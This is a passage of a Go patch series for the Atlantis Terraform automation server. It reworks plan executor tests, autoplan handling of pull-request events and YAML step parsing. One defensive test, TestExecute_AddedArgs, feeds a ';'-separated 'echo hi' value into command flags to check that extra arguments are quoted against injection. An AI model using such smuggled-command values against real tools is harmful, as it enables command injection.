result.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key", result.PlanSuccess.LockURL) -} - -func TestExecute_PreExecuteResult(t *testing.T) { - t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - projectResult := events.ProjectResult{ - Failure: "failure", - } - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ProjectResult: projectResult}) - r := p.Execute(&planCtx) - - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Equals(t, "failure", result.Failure) -} - -func TestExecute_MultiProjectFailure(t *testing.T) { - t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.") - p, runner, locker := setupPlanExecutorTest(t) - // Two projects have been modified so we should run plan in two paths. - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - - // Both projects will succeed in the PreExecute stage. - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})). - ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}}) - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})). - ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}}) - - // The first project will fail when running plan - When(runner.RunCommandWithVersion( - planCtx.Log, - "/tmp/clone-repo/path1", - []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, - nil, - "workspace", - )).ThenReturn("", errors.New("path1 err")) - // The second will succeed. We don't need to stub it because by default it - // will return a nil error. - r := p.Execute(&planCtx) - - // We expect Unlock to be called for the failed project. - locker.VerifyWasCalledOnce().Unlock("key1") - - // So at the end we expect the first project to return an error and the second to be successful. - Assert(t, len(r.ProjectResults) == 2, "exp two project results") - result1 := r.ProjectResults[0] - Assert(t, result1.Error != nil, "exp err to not be nil") - Equals(t, "path1 err\n", result1.Error.Error()) - - result2 := r.ProjectResults[1] - Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil") - Equals(t, "", result2.PlanSuccess.TerraformOutput) - Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL) -} - -func TestExecute_PostPlanCommands(t *testing.T) { - t.Log("Should execute post-plan commands and return if there is an error") - p, _, _ := setupPlanExecutorTest(t) - When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) - When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). - ThenReturn("/tmp/clone-repo", nil) - When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). - ThenReturn(events.PreExecuteResult{ - ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}}, - }) - When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")). - ThenReturn("", errors.New("err")) - - r := p.Execute(&planCtx) - - Assert(t, len(r.ProjectResults) == 1, "exp one project result") - result := r.ProjectResults[0] - Assert(t, result.Error != nil, "exp plan error to not be nil") - Equals(t, "running post plan commands: err", result.Error.Error()) -} - -func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) { - RegisterMockTestingT(t) - vcsProxy := vcsmocks.NewMockClientProxy() - w := mocks.NewMockAtlantisWorkspace() - ppe := mocks.NewMockProjectPreExecutor() - runner := tmocks.NewMockClient() - locker := lmocks.NewMockLocker() - run := rmocks.NewMockRunner() - p := events.PlanExecutor{ - VCSClient: vcsProxy, - ProjectFinder: &events.DefaultProjectFinder{}, - Workspace: w, - ProjectPreExecute: ppe, - Terraform: runner, - Locker: locker, - Run: run, - } - return &p, runner, locker -} +// +//import ( +// "errors" +// "testing" +// +// "github.com/mohae/deepcopy" +// . "github.com/petergtz/pegomock" +// "github.com/runatlantis/atlantis/server/events" +// "github.com/runatlantis/atlantis/server/events/locking" +// lmocks "github.com/runatlantis/atlantis/server/events/locking/mocks" +// "github.com/runatlantis/atlantis/server/events/mocks" +// "github.com/runatlantis/atlantis/server/events/models" +// rmocks "github.com/runatlantis/atlantis/server/events/run/mocks" +// tmocks "github.com/runatlantis/atlantis/server/events/terraform/mocks" +// vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" +// "github.com/runatlantis/atlantis/server/events/vcs/mocks/matchers" +// "github.com/runatlantis/atlantis/server/logging" +// . "github.com/runatlantis/atlantis/testing" +//) +// +//var planCtx = events.CommandContext{ +// Command: &events.Command{ +// Name: events.Plan, +// Workspace: "workspace", +// Dir: "", +// }, +// Log: logging.NewNoopLogger(), +// BaseRepo: models.Repo{}, +// HeadRepo: models.Repo{}, +// Pull: models.PullRequest{}, +// User: models.User{ +// Username: "anubhavmishra", +// }, +//} +// +//func TestExecute_ModifiedFilesErr(t *testing.T) { +// t.Log("If GetModifiedFiles returns an error we return an error") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn(nil, errors.New("err")) +// r := p.Execute(&planCtx) +// +// Assert(t, r.Error != nil, "exp .Error to be set") +// Equals(t, "getting modified files: err", r.Error.Error()) +//} +// +//func TestExecute_NoModifiedProjects(t *testing.T) { +// t.Log("If there are no modified projects we return a failure") +// p, _, _ := setupPlanExecutorTest(t) +// // We don't need to actually mock VCSClient.GetModifiedFiles because by +// // default it will return an empty slice which is what we want for this test. +// r := p.Execute(&planCtx) +// +// Equals(t, "No Terraform files were modified.", r.Failure) +//} +// +//func TestExecute_CloneErr(t *testing.T) { +// t.Log("If AtlantisWorkspace.Clone returns an error we return an error") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")).ThenReturn("", errors.New("err")) +// r := p.Execute(&planCtx) +// +// Assert(t, r.Error != nil, "exp .Error to be set") +// Equals(t, "err", r.Error.Error()) +//} +// +//func TestExecute_DirectoryAndWorkspaceSet(t *testing.T) { +// t.Log("Test that we run plan in the right directory and workspace if they're set") +// p, runner, _ := setupPlanExecutorTest(t) +// ctx := deepcopy.Copy(planCtx).(events.CommandContext) +// ctx.Log = logging.NewNoopLogger() +// ctx.Command.Dir = "dir1/dir2" +// ctx.Command.Workspace = "workspace-flag" +// +// When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace-flag")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "dir1/dir2"})). +// ThenReturn(events.PreExecuteResult{ +// LockResponse: locking.TryLockResponse{ +// LockKey: "key", +// }, +// }) +// r := p.Execute(&ctx) +// +// runner.VerifyWasCalledOnce().RunCommandWithVersion( +// ctx.Log, +// "/tmp/clone-repo/dir1/dir2", +// []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/dir1/dir2/workspace-flag.tfplan", "-var", "atlantis_user=anubhavmishra"}, +// nil, +// "workspace-flag", +// ) +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key", result.PlanSuccess.LockURL) +//} +// +//func TestExecute_AddedArgs(t *testing.T) { +// t.Log("Test that we include extra-args added to the comment in the plan command") +// p, runner, _ := setupPlanExecutorTest(t) +// ctx := deepcopy.Copy(planCtx).(events.CommandContext) +// ctx.Log = logging.NewNoopLogger() +// ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} +// +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&ctx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). +// ThenReturn(events.PreExecuteResult{ +// LockResponse: locking.TryLockResponse{ +// LockKey: "key", +// }, +// }) +// r := p.Execute(&ctx) +// +// runner.VerifyWasCalledOnce().RunCommandWithVersion( +// ctx.Log, +// "/tmp/clone-repo", +// []string{ +// "plan", +// "-refresh", +// "-no-color", +// "-out", +// "/tmp/clone-repo/workspace.tfplan", +// "-var", +// "atlantis_user=anubhavmishra", +// // NOTE: extra args should be quoted to prevent an attacker from +// // appending malicious commands. +// "\"-target=resource\"", +// "\"-var\"", +// "\"a=b\"", +// "\";\"", +// "\"echo\"", +// "\"hi\"", +// }, +// nil, +// "workspace", +// ) +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key", result.PlanSuccess.LockURL) +//} +// +//func TestExecute_Success(t *testing.T) { +// t.Log("If there are no errors, the plan should be returned") +// p, runner, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). +// ThenReturn(events.PreExecuteResult{ +// LockResponse: locking.TryLockResponse{ +// LockKey: "key", +// }, +// }) +// +// r := p.Execute(&planCtx) +// +// runner.VerifyWasCalledOnce().RunCommandWithVersion( +// planCtx.Log, +// "/tmp/clone-repo", +// []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, +// nil, +// "workspace", +// ) +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key", result.PlanSuccess.LockURL) +//} +// +//func TestExecute_PreExecuteResult(t *testing.T) { +// t.Log("If DefaultProjectPreExecutor.Execute returns a ProjectResult we should return it") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// projectResult := events.ProjectResult{ +// Failure: "failure", +// } +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). +// ThenReturn(events.PreExecuteResult{ProjectResult: projectResult}) +// r := p.Execute(&planCtx) +// +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Equals(t, "failure", result.Failure) +//} +// +//func TestExecute_MultiProjectFailure(t *testing.T) { +// t.Log("If is an error planning in one project it should be returned. It shouldn't affect another project though.") +// p, runner, locker := setupPlanExecutorTest(t) +// // Two projects have been modified so we should run plan in two paths. +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"path1/file.tf", "path2/file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// +// // Both projects will succeed in the PreExecute stage. +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path1"})). +// ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key1"}}) +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "path2"})). +// ThenReturn(events.PreExecuteResult{LockResponse: locking.TryLockResponse{LockKey: "key2"}}) +// +// // The first project will fail when running plan +// When(runner.RunCommandWithVersion( +// planCtx.Log, +// "/tmp/clone-repo/path1", +// []string{"plan", "-refresh", "-no-color", "-out", "/tmp/clone-repo/path1/workspace.tfplan", "-var", "atlantis_user=anubhavmishra"}, +// nil, +// "workspace", +// )).ThenReturn("", errors.New("path1 err")) +// // The second will succeed. We don't need to stub it because by default it +// // will return a nil error. +// r := p.Execute(&planCtx) +// +// // We expect Unlock to be called for the failed project. +// locker.VerifyWasCalledOnce().Unlock("key1") +// +// // So at the end we expect the first project to return an error and the second to be successful. +// Assert(t, len(r.ProjectResults) == 2, "exp two project results") +// result1 := r.ProjectResults[0] +// Assert(t, result1.Error != nil, "exp err to not be nil") +// Equals(t, "path1 err\n", result1.Error.Error()) +// +// result2 := r.ProjectResults[1] +// Assert(t, result2.PlanSuccess != nil, "exp plan success to not be nil") +// Equals(t, "", result2.PlanSuccess.TerraformOutput) +// Equals(t, "lockurl-key2", result2.PlanSuccess.LockURL) +//} +// +//func TestExecute_PostPlanCommands(t *testing.T) { +// t.Log("Should execute post-plan commands and return if there is an error") +// p, _, _ := setupPlanExecutorTest(t) +// When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) +// When(p.Workspace.Clone(planCtx.Log, planCtx.BaseRepo, planCtx.HeadRepo, planCtx.Pull, "workspace")). +// ThenReturn("/tmp/clone-repo", nil) +// When(p.ProjectPreExecute.Execute(&planCtx, "/tmp/clone-repo", models.Project{RepoFullName: "", Path: "."})). +// ThenReturn(events.PreExecuteResult{ +// ProjectConfig: events.ProjectConfig{PostPlan: []string{"post-plan"}}, +// }) +// When(p.Run.Execute(planCtx.Log, []string{"post-plan"}, "/tmp/clone-repo", "workspace", nil, "post_plan")). +// ThenReturn("", errors.New("err")) +// +// r := p.Execute(&planCtx) +// +// Assert(t, len(r.ProjectResults) == 1, "exp one project result") +// result := r.ProjectResults[0] +// Assert(t, result.Error != nil, "exp plan error to not be nil") +// Equals(t, "running post plan commands: err", result.Error.Error()) +//} +// +//func setupPlanExecutorTest(t *testing.T) (*events.PlanExecutor, *tmocks.MockClient, *lmocks.MockLocker) { +// RegisterMockTestingT(t) +// vcsProxy := vcsmocks.NewMockClientProxy() +// w := mocks.NewMockAtlantisWorkspace() +// ppe := mocks.NewMockProjectPreExecutor() +// runner := tmocks.NewMockClient() +// locker := lmocks.NewMockLocker() +// run := rmocks.NewMockRunner() +// p := events.PlanExecutor{ +// VCSClient: vcsProxy, +// ProjectFinder: &events.DefaultProjectFinder{}, +// Workspace: w, +// ProjectPreExecute: ppe, +// Terraform: runner, +// Locker: locker, +// Run: run, +// } +// return &p, runner, locker +//} diff --git a/server/events/project_result.go b/server/events/project_result.go index 94a6d3a468..ca5a1ecee4 100644 --- a/server/events/project_result.go +++ b/server/events/project_result.go @@ -18,6 +18,7 @@ import "github.com/runatlantis/atlantis/server/events/vcs" // ProjectResult is the result of executing a plan/apply for a project. type ProjectResult struct { Path string + Workspace string Error error Failure string PlanSuccess *PlanSuccess diff --git a/server/events/runtime/repoconfig.go b/server/events/runtime/repoconfig.go index 138f73f0db..0880920fb5 100644 --- a/server/events/runtime/repoconfig.go +++ b/server/events/runtime/repoconfig.go @@ -5,6 +5,10 @@ import ( "github.com/runatlantis/atlantis/server/logging" ) +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + type ApplyRequirement interface { // IsMet returns true if the requirement is met and false if not. // If it returns false, it also returns a string describing why not. @@ -12,7 +16,9 @@ type ApplyRequirement interface { } type PlanStage struct { - Steps []Step + Steps []Step + Workspace string + ProjectPath string } type ApplyStage struct { diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go index dade99baef..7a5730665f 100644 --- a/server/events/yaml/project.go +++ b/server/events/yaml/project.go @@ -1,12 +1,12 @@ package yaml type Project struct { - Dir string `yaml:"dir"` - Workspace string `yaml:"workspace"` - Workflow string `yaml:"workflow"` - TerraformVersion string `yaml:"terraform_version"` - AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` - ApplyRequirements []string `yaml:"apply_requirements"` + Dir string `yaml:"dir"` + Workspace string `yaml:"workspace"` + Workflow string `yaml:"workflow"` + TerraformVersion string `yaml:"terraform_version"` + AutoPlan AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements"` } const DefaultWorkspace = "default" @@ -17,7 +17,7 @@ func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { // Set up defaults. defaults := alias{ Workspace: DefaultWorkspace, - AutoPlan: &AutoPlan{ + AutoPlan: AutoPlan{ Enabled: true, WhenModified: []string{"**/*.tf"}, }, diff --git a/server/events_controller.go b/server/events_controller.go index b5a447be14..b5b3c73300 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -51,6 +51,10 @@ type EventsController struct { // startup to support. SupportedVCSHosts []models.VCSHostType VCSClient vcs.ClientProxy + // AtlantisGithubUser is the user that atlantis is running as for Github. + AtlantisGithubUser models.User + // AtlantisGitlabUser is the user that atlantis is running as for Gitlab. + AtlantisGitlabUser models.User } // Post handles POST webhook requests. @@ -118,34 +122,76 @@ func (e *EventsController) HandleGithubCommentEvent(w http.ResponseWriter, event // request if the event is a pull request closed event. It's exported to make // testing easier. func (e *EventsController) HandleGithubPullRequestEvent(w http.ResponseWriter, pullEvent *github.PullRequestEvent, githubReqID string) { - pull, _, err := e.Parser.ParseGithubPull(pullEvent.PullRequest) + pull, headRepo, err := e.Parser.ParseGithubPull(pullEvent.PullRequest) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing pull data: %s %s", err, githubReqID) return } - repo, err := e.Parser.ParseGithubRepo(pullEvent.Repo) + baseRepo, err := e.Parser.ParseGithubRepo(pullEvent.Repo) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing repo data: %s %s", err, githubReqID) return } - e.handlePullRequestEvent(w, repo, pull) + var eventType string + switch pullEvent.GetAction() { + case "opened": + eventType = OpenPullEvent + case "synchronize": + eventType = UpdatedPullEvent + case "closed": + eventType = ClosedPullEvent + default: + eventType = OtherPullEvent + } + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGithubUser, eventType) } -func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, repo models.Repo, pull models.PullRequest) { - if !e.RepoWhitelist.IsWhitelisted(repo.FullName, repo.VCSHost.Hostname) { +const OpenPullEvent = "opened" +const UpdatedPullEvent = "updated" +const ClosedPullEvent = "closed" +const OtherPullEvent = "other" + +func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User, eventType string) { + if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { + // If the repo isn't whitelisted and we receive an opened pull request + // event we comment back on the pull request that the repo isn't + // whitelisted. This is because the user might be expecting Atlantis to + // autoplan. For other events, we just ignore them. + if eventType == OpenPullEvent { + e.commentNotWhitelisted(w, baseRepo, pull.Num) + } e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") return } - if pull.State != models.Closed { - e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event") + + switch eventType { + case OpenPullEvent, UpdatedPullEvent: + // If the pull request was opened or updated, we will try to autoplan. + + // Respond with success and then actually execute the command asynchronously. + // We use a goroutine so that this function returns and the connection is + // closed. + fmt.Fprintln(w, "Processing...") + // We use a Command to represent autoplanning but we set dir and + // workspace to '*' to indicate that all applicable dirs and workspaces + // should be planned. + autoplanCmd := events.NewCommand("*", nil, events.Plan, false, "*", true) + go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pull.Num, autoplanCmd) return - } - if err := e.PullCleaner.CleanUpPull(repo, pull); err != nil { - e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err) + case ClosedPullEvent: + // If the pull request was closed, we delete locks. + if err := e.PullCleaner.CleanUpPull(baseRepo, pull); err != nil { + e.respond(w, logging.Error, http.StatusInternalServerError, "Error cleaning pull request: %s", err) + return + } + e.Logger.Info("deleted locks and workspace for repo %s, pull %d", baseRepo.FullName, pull.Num) + fmt.Fprintln(w, "Pull request cleaned successfully") + return + case OtherPullEvent: + // Else we ignore the event. + e.respond(w, logging.Debug, http.StatusOK, "Ignoring opened pull request event") return } - e.Logger.Info("deleted locks and workspace for repo %s, pull %d", repo.FullName, pull.Num) - fmt.Fprintln(w, "Pull request cleaned successfully") } func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) { @@ -191,10 +237,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { - errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```" - if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil { - e.Logger.Err("unable to comment on pull request: %s", err) - } + e.commentNotWhitelisted(w, baseRepo, pullNum) e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted") return } @@ -222,12 +265,23 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // request if the event is a merge request closed event. It's exported to make // testing easier. func (e *EventsController) HandleGitlabMergeRequestEvent(w http.ResponseWriter, event gitlab.MergeEvent) { - pull, repo, err := e.Parser.ParseGitlabMergeEvent(event) + pull, baseRepo, headRepo, err := e.Parser.ParseGitlabMergeEvent(event) if err != nil { e.respond(w, logging.Error, http.StatusBadRequest, "Error parsing webhook: %s", err) return } - e.handlePullRequestEvent(w, repo, pull) + var eventType string + switch event.ObjectAttributes.Action { + case "open": + eventType = OpenPullEvent + case "update": + eventType = UpdatedPullEvent + case "merge", "close": + eventType = ClosedPullEvent + default: + eventType = OtherPullEvent + } + e.handlePullRequestEvent(w, baseRepo, headRepo, pull, e.AtlantisGitlabUser, eventType) } // supportsHost returns true if h is in e.SupportedVCSHosts and false otherwise. @@ -246,3 +300,12 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel, w.WriteHeader(code) fmt.Fprintln(w, response) } + +// commentNotWhitelisted comments on the pull request that the repo is not +// whitelisted. +func (e *EventsController) commentNotWhitelisted(w http.ResponseWriter, baseRepo models.Repo, pullNum int) { + errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```" + if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil { + e.Logger.Err("unable to comment on pull request: %s", err) + } +} diff --git a/server/server.go b/server/server.go index 8ae0e5b6eb..368553a0ea 100644 --- a/server/server.go +++ b/server/server.go @@ -37,7 +37,6 @@ import ( "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -201,10 +200,11 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ConfigReader: configReader, Terraform: terraformClient, } - executionPlanner := &runtime.ExecutionPlanner{ + executionPlanner := &events.ExecutionPlanner{ ParserValidator: &yaml.ParserValidator{}, DefaultTFVersion: terraformClient.Version(), TerraformExecutor: terraformClient, + ProjectFinder: &events.DefaultProjectFinder{}, } underlyingRouter := mux.NewRouter() router := &Router{ @@ -289,6 +289,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { RepoWhitelist: repoWhitelist, SupportedVCSHosts: supportedVCSHosts, VCSClient: vcsClient, + AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, + AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, } return &Server{ AtlantisVersion: config.AtlantisVersion, From f59fe33a4cc7df80b4677a10e5edb690422acb7a Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 12 Jun 2018 18:43:22 +0100 Subject: [PATCH 19/69] Parse YAML without defaults/validation. --- server/events/execution_planner.go | 6 +- server/events/yaml/auto_plan.go | 8 +- server/events/yaml/auto_plan_test.go | 36 +- server/events/yaml/config.go | 7 - server/events/yaml/config_test.go | 74 -- server/events/yaml/parser_validator.go | 43 +- server/events/yaml/parser_validator_test.go | 1002 +++++++++---------- server/events/yaml/project.go | 32 +- server/events/yaml/project_test.go | 32 +- server/events/yaml/spec.go | 7 + server/events/yaml/spec_test.go | 152 +++ server/events/yaml/stage.go | 2 +- server/events/yaml/stage_test.go | 47 + server/events/yaml/step.go | 61 ++ server/events/yaml/step_config.go | 82 -- server/events/yaml/step_config_test.go | 159 --- server/events/yaml/step_test.go | 134 +++ server/events/yaml/workflow.go | 58 +- server/events/yaml/workflow_test.go | 92 +- server/events/yaml/yaml_test.go | 13 + testing/assertions.go | 8 +- 21 files changed, 1022 insertions(+), 1033 deletions(-) delete mode 100644 server/events/yaml/config.go delete mode 100644 server/events/yaml/config_test.go create mode 100644 server/events/yaml/spec.go create mode 100644 server/events/yaml/spec_test.go create mode 100644 server/events/yaml/stage_test.go create mode 100644 server/events/yaml/step.go delete mode 100644 server/events/yaml/step_config.go delete mode 100644 server/events/yaml/step_config_test.go create mode 100644 server/events/yaml/step_test.go create mode 100644 server/events/yaml/yaml_test.go diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go index e6e928c24b..415ed2da18 100644 --- a/server/events/execution_planner.go +++ b/server/events/execution_planner.go @@ -135,7 +135,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge // We have a workflow defined, so now we need to build it. meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) var steps []runtime.Step - var stepsConfig []yaml.StepConfig + var stepsConfig []yaml.Step if stageName == PlanStageName { stepsConfig = workflow.Plan.Steps } else { @@ -143,7 +143,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge } for _, stepConfig := range stepsConfig { var step runtime.Step - switch stepConfig.StepType { + switch stepConfig.Key { case "init": step = &runtime.InitStep{ Meta: meta, @@ -162,7 +162,7 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge case "run": step = &runtime.RunStep{ Meta: meta, - Commands: stepConfig.Run, + Commands: stepConfig.StringVal, } } steps = append(steps, step) diff --git a/server/events/yaml/auto_plan.go b/server/events/yaml/auto_plan.go index 16bcb80f5b..00eb0cc79d 100644 --- a/server/events/yaml/auto_plan.go +++ b/server/events/yaml/auto_plan.go @@ -1,10 +1,6 @@ package yaml type AutoPlan struct { - WhenModified []string `yaml:"when_modified"` - Enabled bool `yaml:"enabled"` + WhenModified []string `yaml:"when_modified,omitempty"` + Enabled *bool `yaml:"enabled,omitempty"` } - -// NOTE: AutoPlan does not implement UnmarshalYAML because we are unable to set -// defaults for bool and []string fields and so we just use the normal yaml -// unmarshalling. diff --git a/server/events/yaml/auto_plan_test.go b/server/events/yaml/auto_plan_test.go index 2dd8a43ef9..04d517d94f 100644 --- a/server/events/yaml/auto_plan_test.go +++ b/server/events/yaml/auto_plan_test.go @@ -15,31 +15,53 @@ func TestAutoPlan_UnmarshalYAML(t *testing.T) { exp yaml.AutoPlan }{ { - description: "should use defaults", - input: ` -`, + description: "omit unset fields", + input: "", exp: yaml.AutoPlan{ - Enabled: false, + Enabled: nil, WhenModified: nil, }, }, { - description: "should use all set fields", + description: "all fields set", input: ` enabled: true when_modified: ["something-else"] `, exp: yaml.AutoPlan{ - Enabled: true, + Enabled: Bool(true), + WhenModified: []string{"something-else"}, + }, + }, + { + description: "enabled false", + input: ` +enabled: false +when_modified: ["something-else"] +`, + exp: yaml.AutoPlan{ + Enabled: Bool(false), WhenModified: []string{"something-else"}, }, }, + { + description: "modified elem empty", + input: ` +enabled: false +when_modified: +- +`, + exp: yaml.AutoPlan{ + Enabled: Bool(false), + WhenModified: []string{""}, + }, + }, } for _, c := range cases { t.Run(c.description, func(t *testing.T) { var a yaml.AutoPlan - err := yamlv2.Unmarshal([]byte(c.input), &a) + err := yamlv2.UnmarshalStrict([]byte(c.input), &a) Ok(t, err) 